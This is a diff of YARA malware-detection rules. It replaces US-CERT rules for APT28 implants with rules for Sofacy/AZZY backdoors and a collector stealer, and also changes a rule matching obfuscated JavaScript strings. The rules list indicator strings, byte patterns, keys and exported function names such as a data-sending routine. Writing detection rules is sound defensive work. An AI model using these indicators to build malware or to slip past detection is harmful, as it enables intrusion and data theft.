+		$b9 = "api.loadJS(\"\".concat(api.base.baseUrl"
+		$b10 = "\"\".concat(imgUrls[i], \"?t=\""
+		$b11 = "key: \"report\",\n      value: function report(data) {\n        return this.api.callback"
+		$b12 = "that.api.base.debounce("
+		$b13 = "'className','restOfNavigator','push'"
+		$b14 = ";};'use strict';function _typeof("
+		$c1 = "/public/dependence/jquery"
+		$c2 = "'http://bn6kma5cpxill4pe.onion/static/images/tor-logo1x.png'"
+		$c3 = "'163.com not login';"
+		$c4 = "'ws://localhost:'"
+		$c5 = "function _typeof(obj) { \"@babel/helpers - typeof\"; "
+		$c6 = "'socketWatcher'"
+		$c7 = "['configurable']=!![];"
+		$c8 = "')]({'status':!![],'data':_0x"
+		$c9 = "')]={'localStorage':'localStorage'in window?window[_0x"
+		$c10 = "Browser not supported geolocation.');"
+		$c11 = "')]({'status':!![],'msg':'','data':_0x"
+		$c12 = "var Plugin = /*#__PURE__*/function () {"
+		$use_strict1 = "\"use strict\";"
+		$use_strict2 = "'use strict';"
+		$e1 = "Cannot\x20call\x20a\x20class\x20as\x20a\x20function" base64
+		$e2 = "The\x20command\x20is\x20sent\x20successfully,\x20wait\x20for\x20the\x20result\x20to\x20return" base64
+		$e3 = "getUserMedia\x20is\x20not\x20implemented\x20in\x20this\x20browser" base64
+		$e4 = "http://bn6kma5cpxill4pe.onion/static/images/tor-logo1x.png" base64
+		$e5 = "/public/dependence/jquery" base64
+		$e6 = "\x20\x22*\x22)\x0a\x20\x20}\x0a\x20\x20document.documentElement.appendChild(" base64
+		$e8 = "\x0a\x20\x20var\x20data\x20=\x20{}\x0a\x20\x20window.c\x20=\x200\x0a\x20\x20script2\x20=\x20document.createElement(\x22script\x22)\x0a\x20\x20script2.async\x20=\x20true\x0a\x20\x20script2.src\x20=\x20\x22" base64
+		$e9 = "{isPluginCallback:\x20true,\x20data,\x20plugin:\x20" base64
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and 2 of them
+		filesize < 1000000 and ( any of ( $a* ) or 2 of ( $b* ) or 4 of ( $c* ) or 2 of ( $e* ) or ( any of ( $use_strict* ) and ( ( any of ( $b* ) and 2 of ( $c* ) ) or any of ( $e* ) ) ) )
 }
-rule SIGNATURE_BASE_IMPLANT_4_V13 : FILE
+rule SIGNATURE_BASE_Sofacy_Malware_Strangespaces : FILE
 {
 	meta:
-		description = "BlackEnergy / Voodoo Bear Implant by APT28"
-		author = "US CERT"
-		id = "e96a7d9f-1840-542f-9a9b-95e74377f234"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L1011-L1032"
+		description = "Detetcs strange strings from Sofacy malware with many spaces"
+		author = "Florian Roth (Nextron Systems)"
+		id = "60f99b88-f256-5289-852c-c0bf27f1cbd4"
+		date = "2015-12-04"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_dec15.yar#L8-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "576c07c44105d2a38ca715d366f68058b2b3118f25e91d2d3e2d20e932fc9453"
-		score = 85
+		logic_hash = "ee8bbebaa0978d038424cee3775ba312476afa014ce0d57c73d6844f758116ca"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$XMLDOM1 = {81 BF 33 29 36 7B D2 11 B2 0E 00 C0 4F 98 3E 60}
-		$XMLDOM2 = {90 BF 33 29 36 7B D2 11 B2 0E 00 C0 4F 98 3E 60}
-		$XMLPARSE = {8B 06 [0-2] 8D 55 ?C 52 FF 75 08 [0-2] 50 FF 91 04 01 00 00
-         66 83 7D ?C FF 75 3? 8B 06 [0-2] 8D 55 F? 52 50 [0-2] FF 51 30 85 C0
-         78 2?}
-		$EXP1 = "DispatchCommand"
-		$EXP2 = "DispatchEvent"
-		$BDATA = {85 C0 74 1? 0F B7 4? 06 83 C? 28 [0-6] 72 ?? 33 C0 5F 5E 5B 5D
-         C2 08 00 8B 4? 0? 8B 4? 0? 89 01 8B 4? 0C 03 [0-2] EB E?}
+		$s2 = "Delete Temp Folder Service                                  " fullword wide
+		$s3 = " Operating System                        " fullword wide
+		$s4 = "Microsoft Corporation                                       " fullword wide
+		$s5 = " Microsoft Corporation. All rights reserved.               " fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and 3 of them
 }
-rule SIGNATURE_BASE_IMPLANT_5_V1
+rule SIGNATURE_BASE_Sofacy_Malware_AZZY_Backdoor_1 : FILE
 {
 	meta:
-		description = "XTunnel Implant by APT28"
-		author = "US CERT"
-		id = "dee08753-3465-5bf2-acd5-aa6cc80aba3c"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L1034-L1051"
+		description = "AZZY Backdoor - Sample 1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "184dc45e-8014-5dcf-a033-d77586c60fdf"
+		date = "2015-12-04"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_dec15.yar#L25-L40"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d94192d408036bf02052dc5145b78fea61323810b2abdbba64c65e1f6387ea42"
-		score = 85
+		hash = "a9dc96d45702538c2086a749ba2fb467ba8d8b603e513bdef62a024dfeb124cb"
+		logic_hash = "9c99f218d856d374423cada147bc38c8319f9ebff1e43e012143fad7af992d29"
+		score = 75
 		quality = 85
-		tags = ""
-
-	strings:
-		$hexstr = {2D 00 53 00 69 00 00 00 2D 00 53 00 70 00 00 00 2D 00 55 00
-         70 00 00 00 2D 00 50 00 69 00 00 00 2D 00 50 00 70 00 00 00}
-		$UDPMSG1 = "error 2005 recv from server UDP - %d\x0a"
-		$TPSMSG1 = "error 2004 send to TPS - %d\x0a"
-		$TPSMSG2 = "error 2003 recv from TPS - %d\x0a"
-		$UDPMSG2 = "error 2002 send to server UDP - %d\x0a"
-
-	condition:
-		any of them
-}
-rule SIGNATURE_BASE_IMPLANT_5_V2
-{
-	meta:
-		description = "XTunnel Implant by APT28"
-		author = "US CERT"
-		id = "40f60306-41ee-5a18-84e2-cf479a6bc849"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L1053-L1192"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "43e3df19ecd2068636b92c7a5c0399b22f8fa478e3e1562f392e78c5a268a1e5"
-		score = 85
-		quality = 60
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$key0 = { 987AB999FE0924A2DF0A412B14E26093746FCDF9BA31DC05536892C33B116AD3 }
-		$key1 = { 8B236C892D902B0C9A6D37AE4F9842C3070FBDC14099C6930158563C6AC00FF5 }
-		$key2 = { E47B7F110CAA1DA617545567EC972AF3A6E7B4E6807B7981D3CFBD3D8FCC3373 }
-		$key3 = { 48B284545CA1FA74F64FDBE2E605D68CED8A726D05EBEFD9BAAC164A7949BDC1 }
-		$key4 = { FB421558E30FCCD95FA7BC45AC92D2991C44072230F6FBEAA211341B5BF2DC56 }
-		$key5 = { 34F1AE17017AF16021ADA5CE3F77675BBC6E7DEC6478D6078A0B22E5FDFF3B31 }
-		$key6 = { F0EA48F164395186E6F754256EBB812A2AFE168E77ED9501F8B8E6F5B72126A7 }
-		$key7 = { 0B6E9970A8EAF68EE14AB45005357A2F3391BEAA7E53AB760B916BC2B3916ABE }
-		$key8 = { FF032EA7ED2436CF6EEA1F741F99A3522A61FDA8B5A81EC03A8983ED1AEDAB1A }
-		$key9 = { F0DAC1DDFEF7AC6DE1CBE1006584538FE650389BF8565B32E0DE1FFACBCB14BB }
-		$key10 = { A5D699A3CD4510AF11F1AF767602055C523DF74B94527D74319D6EFC6883B80D }
-		$key11 = { 5951B02696C1D5A7B2851D28872384DA607B25F4CEA268FF3FD7FBA75AB3B4B3 }
-		$key12 = { 0465D99B26AF42D8346001BB838595E301BAD8CF5D40CE9C17C944717DF82481 }
-		$key13 = { 5DFE1C83AD5F5CE1BF5D9C42E23225E3ECFDB2493E80E6554A2AC7C722EB4880 }
-		$key14 = { E9650396C45F7783BC14C59F46EA8232E8357C26B5627BFF8C42C6AE2E0F2E17 }
-		$key15 = { 7432AE389125BB4E3980ED7F6A6FB252A42E785A90F4591C3620CA642FF97CA3 }
-		$key16 = { 2B2ADBBC4F960A8916F7088067BAD30BE84B65783FBF9476DF5FDA0E5856B183 }
-		$key17 = { 808C3FD0224A59384161B8A81C8BB404D7197D16D8118CB77067C5C8BD764B3E }
-		$key18 = { 028B0E24D5675C16C815BFE4A073E9778C668E65771A1CE881E2B03F58FC7D5B }
-		$key19 = { 878B7F5CF2DC72BAF1319F91A4880931EE979665B1B24D3394FE72EDFAEF4881 }
-		$key20 = { 7AC7DD6CA34F269481C526254D2F563BC6ECA1779FEEAA33EC1C20E60B686785 }
-		$key21 = { 3044F1D394186815DD8E3A2BBD9166837D07FA1CF6A550E2C170C9CDD9305209 }
-		$key22 = { 7544DC095C441E39D258648FE9CB1267D20D83C8B2D3AB734474401DA4932619 }
-		$key23 = { D702223347406C1999D1A9829CBBE96EC86D377A40E2EE84562EA1FAC1C71498 }
-		$key24 = { CA36CB1177382A1009D392A58F7C1357E94AD2292CC0AE82EE4F7DB0179148E1 }
-		$key25 = { C714F23E4C1C4E55F0E1FA7F5D0DD64658A86F84681D07576D840784154F65DC }
-		$key26 = { 63571BAF736904634AFEE2A70CB9ED64615DE8CA7AEF21E773286B8877D065DB }
-		$key27 = { 27808A9BE98FFE348DE1DB999AC9FDFB26E6C5A0D5E688490EF3D186C43661EB }
-		$key28 = { B6EB86A07A85D40866AFA100789FFB9E85C13F5AA7C7A3B6BA753C7EAB9D6A62 }
-		$key29 = { 88F0020375D60BDB85ACDBFE4BD79CD098DB2B3FA2CEF55D4331DBEFCE455157 }
-		$key30 = { 36535AAB296587AE1162AC5D39492DD1245811C72706246A38FF590645AA5D7B }
-		$key31 = { FDB726261CADD52E10818B49CAB81BEF112CB63832DAA26AD9FC711EA6CE99A4 }
-		$key32 = { 86C0CAA26D9FD07D215BC7EB14E2DA250E905D406AFFAB44FB1C62A2EAFC4670 }
-		$key33 = { BC101329B0E3A7D13F6EBC535097785E27D59E92D449D6D06538725034B8C0F0 }
-		$key34 = { C8D31A78B7C149F62F06497F9DC1DDC4967B566AC52C3A2A65AC7A99643B8A2D }
-		$key35 = { 0EA4A5C565EFBB94F5041392C5F0565B6BADC630D9005B3EADD5D81110623E1F }
-		$key36 = { 06E4E46BD3A0FFC8A4125A6A02B0C56D5D8B9E378CF97539CE4D4ADFAF89FEB5 }
-		$key37 = { 6DE22040821F0827316291331256A170E23FA76E381CA7066AF1E5197AE3CFE7 }
-		$key38 = { C6EF27480F2F6F40910074A45715143954BBA78CD74E92413F785BBA5B2AA121 }
-		$key39 = { 19C96A28F8D9698ADADD2E31F2426A46FD11D2D45F64169EDC7158389BFA59B4 }
-		$key40 = { C3C3DDBB9D4645772373A815B5125BB2232D8782919D206E0E79A6A973FF5D36 }
-		$key41 = { C33AF1608037D7A3AA7FB860911312B4409936D236564044CFE6ED42E54B78A8 }
-		$key42 = { 856A0806A1DFA94B5E62ABEF75BEA3B657D9888E30C8D2FFAEC042930BBA3C90 }
-		$key43 = { 244496C524401182A2BC72177A15CDD2EF55601F1D321ECBF2605FFD1B9B8E3F }
-		$key44 = { DF24050364168606D2F81E4D0DEB1FFC417F1B5EB13A2AA49A89A1B5242FF503 }
-		$key45 = { 54FA07B8108DBFE285DD2F92C84E8F09CDAA687FE492237F1BC4343FF4294248 }
-		$key46 = { 23490033D6BF165B9C45EE65947D6E6127D6E00C68038B83C8BFC2BCE905040C }
-		$key47 = { 4E044025C45680609B6EC52FEB3491130A711F7375AAF63D69B9F952BEFD5F0C }
-		$key48 = { 019F31C5F5B2269020EBC00C1F511F2AC23E9D37E89374514C6DA40A6A03176C }
-		$key49 = { A2483197FA57271B43E7276238468CFB8429326CBDA7BD091461147F642BEB06 }
-		$key50 = { 731C9D6E74C589B7ACB019E5F6A6E07ACF12E68CB9A396CE05AA4D69D5387048 }
-		$key51 = { 540DB6C8D23F7F7FEF9964E53F445F0E56459B10E931DEEEDB2B57B063C7F8B7 }
-		$key52 = { D5AF80A7EEFF26DE988AC3D7CE23E62568813551B2133F8D3E973DA15E355833 }
-		$key53 = { E4D8DBD3D801B1708C74485A972E7F00AFB45161C791EE05282BA68660FFBA45 }
-		$key54 = { D79518AF96C920223D687DD596FCD545B126A678B7947EDFBF24661F232064FB }
-		$key55 = { B57CAA4B45CA6E8332EB58C8E72D0D9853B3110B478FEA06B35026D7708AD225 }
-		$key56 = { 077C714C47DFCF79CA2742B1544F4AA8035BB34AEA9D519DEE77745E01468408 }
-		$key57 = { C3F5550AD424839E4CC54FA015994818F4FB62DE99B37C872AF0E52C376934FA }
-		$key58 = { 5E890432AE87D0FA4D209A62B9E37AAEDEDC8C779008FEBAF9E4E6304D1B2AAC }
-		$key59 = { A42EDE52B5AF4C02CFE76488CADE36A8BBC3204BCB1E05C402ECF450071EFCAB }
-		$key60 = { 4CDAFE02894A04583169E1FB4717A402DAC44DA6E2536AE53F5F35467D31F1CA }
-		$key61 = { 0BEFCC953AD0ED6B39CE6781E60B83C0CFD166B124D1966330CBA9ADFC9A7708 }
-		$key62 = { 8A439DC4148A2F4D5996CE3FA152FF702366224737B8AA6784531480ED8C8877 }
-		$key63 = { CF253BE3B06B310901FF48A351471374AD35BBE4EE654B72B860F2A6EC7B1DBB }
-		$key64 = { A0599F50C4D059C5CFA16821E97C9596B1517B9FB6C6116F260415127F32CE1F }
-		$key65 = { 8B6D704F3DC9150C6B7D2D54F9C3EAAB14654ACA2C5C3952604E65DF8133FE0C }
-		$key66 = { A06E5CDD3871E9A3EE17F7E8DAE193EE47DDB87339F2C599402A78C15D77CEFD }
-		$key67 = { E52ADA1D9BC4C089DBB771B59904A3E0E25B531B4D18B58E432D4FA0A41D9E8A }
-		$key68 = { 4778A7E23C686C171FDDCCB8E26F98C4CBEBDF180494A647C2F6E7661385F05B }
-		$key69 = { FE983D3A00A9521F871ED8698E702D595C0C7160A118A7630E8EC92114BA7C12 }
-		$key70 = { 52BA4C52639E71EABD49534BBA80A4168D15762E2D1D913BAB5A5DBF14D9D166 }
-		$key71 = { 931EB8F7BC2AE1797335C42DB56843427EB970ABD601E7825C4441701D13D7B1 }
-		$key72 = { 318FA8EDB989672DBE2B5A74949EB6125727BD2E28A4B084E8F1F50604CCB735 }
-		$key73 = { 5B5F2315E88A42A7B59C1B493AD15B92F819C021BD70A5A6619AAC6666639BC2 }
-		$key74 = { C2BED7AA481951FEB56C47F03EA38236BC425779B2FD1F1397CB79FE2E15C0F0 }
-		$key75 = { D3979B1CB0EC1A655961559704D7CDC019253ACB2259DFB92558B7536D774441 }
-		$key76 = { 0EDF5DBECB772424D879BBDD51899D6AAED736D0311589566D41A9DBB8ED1CC7 }
-		$key77 = { CC798598F0A9BCC82378A5740143DEAF1A147F4B2908A197494B7202388EC905 }
-		$key78 = { 074E9DF7F859BF1BD1658FD2A86D81C282000EAB09AF4252FAB45433421D3849 }
-		$key79 = { 6CD540642E007F00650ED20D7B54CFFD54DDA95D8DEBB087A004BAE222F22C8E }
-		$key80 = { C76CF2F66C71F6D17FC8DEFA1CAEF8718BA1CE188C7EA02C835A0FA54D3B3314 }
-		$key81 = { A7250A149600E515C9C40FE5720756FDA8251635A3B661261070CB5DABFE7253 }
-		$key82 = { 237C67B97D4CCE4610DE2B82E582808EA796C34A4C24715C953CBA403B2C935E }
-		$key83 = { A8FA182547E66B57C497DAAA195A38C0F0FB0A3C1F7B98B4B852F5F37E885127 }
-		$key84 = { 83694CCA50B821144FFBBE6855F62845F1328111AE1AC5666CBA59EB43AA12C6 }
-		$key85 = { 145E906416B17865AD37CD022DF5481F28C930D6E3F53C50B0953BF33F4DB953 }
-		$key86 = { AB49B7C2FA3027A767F5AA94EAF2B312BBE3E89FD924EF89B92A7CF977354C22 }
-		$key87 = { 7E04E478340C209B01CA2FEBBCE3FE77C6E6169F0B0528C42FA4BDA6D90AC957 }
-		$key88 = { 0EADD042B9F0DDBABA0CA676EFA4EDB68A045595097E5A392217DFFC21A8532F }
-		$key89 = { 5623710F134ECACD5B70434A1431009E3556343ED48E77F6A557F2C7FF46F655 }
-		$key90 = { 6968657DB62F4A119F8E5CB3BF5C51F4B285328613AA7DB9016F8000B576561F }
-		$key91 = { DEBB9C95EAE6A68974023C335F8D2711135A98260415DF05845F053AD65B59B4 }
-		$key92 = { 16F54900DBF08950F2C5835153AB636605FB8C09106C0E94CB13CEA16F275685 }
-		$key93 = { 1C9F86F88F0F4882D5CBD32876368E7B311A84418692D652A6A4F315CC499AE8 }
-		$key94 = { E920E0783028FA05F4CE2D6A04BBE636D56A775CFD4DAEA3F2A1B8BEEB52A6D4 }
-		$key95 = { 73874CA3AF47A8A315D50E1990F44F655EC7C15B146FFE0611B6C4FC096BD07C }
-		$key96 = { F21C1FA163C745789C53922C47E191A5A85301BDC2FFC3D3B688CFBFF39F3BE5 }
-		$key97 = { BC5A861F21CB98BD1E2AE9650B7A0BB4CD0C71900B3463C1BC3380AFD2BB948E }
-		$key98 = { 151BAE36E646F30570DC6A7B57752F2481A0B48DD5184E914BCF411D8AD5ACA0 }
-		$key99 = { F05AD6D7A0CADC10A6468BFDBCBB223D5BD6CA30EE19C239E8035772D80312C9 }
-		$key100 = { 5DE9A0FDB37C0D59C298577E5379BCAF4F86DF3E9FA17787A4CEFA7DD10C462E }
-		$key101 = { F5E62BA862380224D159A324D25FD321E5B35F8554D70CF9A506767713BCA508 }
-		$key102 = { A2D1B10409B328DA0CCBFFDE2AD2FF10855F95DA36A1D3DBA84952BB05F8C3A7 }
-		$key103 = { C974ABD227D3AD339FAC11C97E11D904706EDEA610B181B8FAD473FFCC36A695 }
-		$key104 = { AB5167D2241406C3C0178D3F28664398D5213EE5D2C09DCC9410CB604671F5F1 }
-		$key105 = { C25CC4E671CAAA31E137700A9DB3A272D4E157A6A1F47235043D954BAE8A3C70 }
-		$key106 = { E6005757CA0189AC38F9B6D5AD584881399F28DA949A0F98D8A4E3862E20F715 }
-		$key107 = { 204E6CEB4FF59787EF4D5C9CA5A41DDF4445B9D8E0C970B86D543E9C7435B194 }
-		$key108 = { 831D7FD21316590263B69E095ABBE89E01A176E16AE799D83BD774AF0D254390 }
-		$key109 = { 42C36355D9BC573D72F546CDB12E6BB2CFE2933AC92C12040386B310ABF6A1ED }
-		$key110 = { B9044393C09AD03390160041446BF3134D864D16B25F1AB5E5CDC690C4677E7D }
-		$key111 = { 6BC1102B5BE05EEBF65E2C3ACA1F4E17A59B2E57FB480DE016D371DA3AEF57A5 }
-		$key112 = { B068D00B482FF73F8D23795743C76FE8639D405EE54D3EFB20AFD55A9E2DFF4E }
-		$key113 = { 95CF5ADDFE511C8C7496E3B75D52A0C0EFE01ED52D5DD04D0CA6A7ABD3A6F968 }
-		$key114 = { 75534574A4620019F8E3D055367016255034FA7D91CBCA9E717149441742AC8D }
-		$key115 = { 96F1013A5301534BE424A11A94B740E5EB3A627D052D1B769E64BAB6A666433C }
-		$key116 = { 584477AB45CAF729EE9844834F84683ABECAB7C4F7D23A9636F54CDD5B8F19B3 }
-		$key117 = { D3905F185B564149EE85CC3D093477C8FF2F8CF601C68C38BBD81517672ECA3A }
-		$key118 = { BF29521A7F94636D1930AA236422EB6351775A523DE68AF9BF9F1026CEDA618D }
-		$key119 = { 04B3A783470AF1613A9B849FBD6F020EE65C612343EB1C028B2C28590789E60B }
-		$key120 = { 3D8D8E84977FE5D21B6971D8D873E7BED048E21333FE15BE2B3D1732C7FD3D04 }
-		$key121 = { 8ACB88224B6EF466D7653EB0D8256EA86D50BBA14FD05F7A0E77ACD574E9D9FF }
-		$key122 = { B46121FFCF1565A77AA45752C9C5FB3716B6D8658737DF95AE8B6A2374432228 }
-		$key123 = { A4432874588D1BD2317224FB371F324DD60AB25D4191F2F01C5C13909F35B943 }
-		$key124 = { 78E1B7D06ED2A2A044C69B7CE6CDC9BCD77C19180D0B082A671BBA06507349C8 }
-		$key125 = { 540198C3D33A631801FE94E7CB5DA3A2D9BCBAE7C7C3112EDECB342F3F7DF793 }
-		$key126 = { 7E905652CAB96ACBB7FEB2825B55243511DF1CD8A22D0680F83AAF37B8A7CB36 }
-		$key127 = { 37218801DBF2CD92F07F154CD53981E6189DBFBACAC53BC200EAFAB891C5EEC8 }
+		$s0 = "advstorshell.dll" fullword wide
+		$s1 = "advshellstore.dll" fullword ascii
+		$s2 = "Windows Advanced Storage Shell Extension DLL" fullword wide
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and filesize < 150KB and 2 of them
 }
-rule SIGNATURE_BASE_IMPLANT_5_V3
+rule SIGNATURE_BASE_Sofacy_AZZY_Backdoor_Implant_1 : FILE
 {
 	meta:
-		description = "XTunnel Implant by APT28"
-		author = "US CERT"
-		id = "0763e314-85d0-5c16-b766-36298176e0ff"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L1194-L1207"
+		description = "AZZY Backdoor Implant 4.3 - Sample 1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ec6bf8ca-ccb9-532e-8b0d-1fba59efa2da"
+		date = "2015-12-04"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_dec15.yar#L42-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "aec1314858732d30b62a033e85eea50b3375e4f5b0e1818a941979d5be672297"
-		score = 85
+		hash = "1bab1a3e0e501d3c14652ecf60870e483ed4e90e500987c35489f17a44fef26c"
+		logic_hash = "b6ddf1274ed78db0c7183e3cc8063c01e4d011bc2947ec05449f3fd0df2050e7"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$BYTES1 = { 0F AF C0 6? C0 07 00 00 00 2D 01 00 00 00 0F AF ?? 39 ?8 }
-		$BYTES2 = { 0F AF C0 6? C0 07 48 0F AF ?? 39 ?8 }
+		$s1 = "\\tf394kv.dll" wide
+		$s2 = "DWN_DLL_MAIN.dll" fullword ascii
+		$s3 = "?SendDataToServer_2@@YGHPAEKEPAPAEPAK@Z" ascii
+		$s4 = "?Applicate@@YGHXZ" ascii
+		$s5 = "?k@@YGPAUHINSTANCE__@@PBD@Z" ascii
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and 2 of them
 }
-rule SIGNATURE_BASE_IMPLANT_5_V4
+rule SIGNATURE_BASE_Sofacy_AZZY_Backdoor_Helperdll : FILE
 {
 	meta:
-		description = "XTunnel Implant by APT28"
-		author = "US CERT"
-		id = "db6df7ea-f119-5e9a-bcea-c65580418042"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L1209-L1225"
+		description = "Dropped C&C helper DLL for AZZY 4.3"
+		author = "Florian Roth (Nextron Systems)"
+		id = "eae089a0-21dc-5d6e-a4bc-7181dc9b8b35"
+		date = "2015-12-04"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_dec15.yar#L61-L76"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "98a08860453496d9629f62c64fed50a24b8378dcfa39b8b654610c2ac9084fa8"
-		score = 85
+		hash = "6cd30c85dd8a64ca529c6eab98a757fb326de639a39b597414d5340285ba91c6"
+		logic_hash = "100903551eeacf4266fc97a09949bdafe05e94698bed7cea295c8e970df22ec8"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$FBKEY1 = { 987AB999FE0924A2DF0A412B14E26093746FCDF9BA31DC05536892C33B116AD3 }
-		$FBKEY2 = { 8B236C892D902B0C9A6D37AE4F9842C3070FBDC14099C6930158563C6AC00FF5 }
-		$FBKEY3 = { E47B7F110CAA1DA617545567EC972AF3A6E7B4E6807B7981D3CFBD3D8FCC3373 }
-		$FBKEY4 = { 48B284545CA1FA74F64FDBE2E605D68CED8A726D05EBEFD9BAAC164A7949BDC1 }
-		$FBKEY5 = { FB421558E30FCCD95FA7BC45AC92D2991C44072230F6FBEAA211341B5BF2DC56 }
+		$s0 = "snd.dll" fullword ascii
+		$s1 = "InternetExchange" fullword ascii
+		$s2 = "SendData"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_IMPLANT_6_V1 : FILE
+rule SIGNATURE_BASE_Sofacy_Collectorstealer_Gen1 : FILE
 {
 	meta:
-		description = "Sednit / EVILTOSS Implant by APT28"
-		author = "US CERT"
-		id = "0554ec8e-f45d-5afc-8874-dc8adfac5cdf"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L1227-L1243"
+		description = "Generic rule to detect Sofacy Malware Collector Stealer"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f9462dd9-f6b6-59f4-a443-12d6f3be444e"
+		date = "2015-12-04"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_dec15.yar#L80-L97"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c60402a029034545df302485c14e9485f806f2bc7d5fd759e84d1ecba9854837"
-		score = 85
+		logic_hash = "1b6693fa45fed5ed001d8fb4b43427c7036d95cb36b125e7242864d000085018"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "4e4606313c423b681e11110ca5ed3a2b2632ec6c556b7ab9642372ae709555f3"
+		hash2 = "92dcb0d8394d0df1064e68d90cd90a6ae5863e91f194cbaac85ec21c202f581f"
 
 	strings:
-		$STR1 = "dll.dll" wide ascii
-		$STR2 = "Init1" wide ascii
-		$STR3 = "netui.dll" wide ascii
+		$s0 = "NvCpld.dll" fullword ascii
+		$s1 = "NvStop" fullword ascii
+		$s2 = "NvStart" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_IMPLANT_6_V2 : FILE
+rule SIGNATURE_BASE_Sofacy_Collectorstealer_Gen2 : FILE
 {
